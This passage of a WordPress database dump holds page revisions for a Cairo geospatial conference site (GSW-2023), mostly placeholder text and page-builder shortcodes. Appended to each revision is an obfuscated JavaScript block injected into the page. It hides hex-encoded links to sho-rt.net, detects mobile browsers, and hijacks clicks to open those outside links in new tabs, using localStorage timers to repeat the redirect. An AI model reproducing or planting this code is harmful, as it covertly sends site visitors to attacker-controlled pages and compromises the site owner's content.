)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 22:41:33','2022-11-08 22:41:33','',3066,'https://gsw2023.com/?p=3102',0,'revision','',0),
(3103,1,'2022-11-08 22:44:04','2022-11-08 22:44:04','','Screenshot_1','','inherit','open','closed','','screenshot_1','','','2022-11-08 22:44:04','2022-11-08 22:44:04','',3066,'https://gsw2023.com/wp-content/uploads/2022/11/Screenshot_1.jpg',0,'attachment','image/jpeg',0),
(3104,1,'2022-11-08 22:44:39','2022-11-08 22:44:39','[vc_row][vc_column width=\"1/3\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column][vc_column width=\"1/3\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][ult_buttons btn_align=\"ubtn-center\" icon=\"fas fa-stream\" icon_size=\"32\" btn_icon_pos=\"ubtn-sep-icon-left-rev\"][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 22:44:39','2022-11-08 22:44:39','',3066,'https://gsw2023.com/?p=3104',0,'revision','',0),
(3105,1,'2022-11-08 22:48:55','2022-11-08 22:48:55','[vc_row][vc_column width=\"1/3\"][vc_column_text]\r\n<h2>Egypt GSW\'2023</h2>\r\n<h2>The First Geospatial Week in Africa and The Middle East</h2>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column][vc_column width=\"1/3\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][ult_buttons btn_align=\"ubtn-center\" icon=\"fas fa-stream\" icon_size=\"32\" btn_icon_pos=\"ubtn-sep-icon-left-rev\"][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 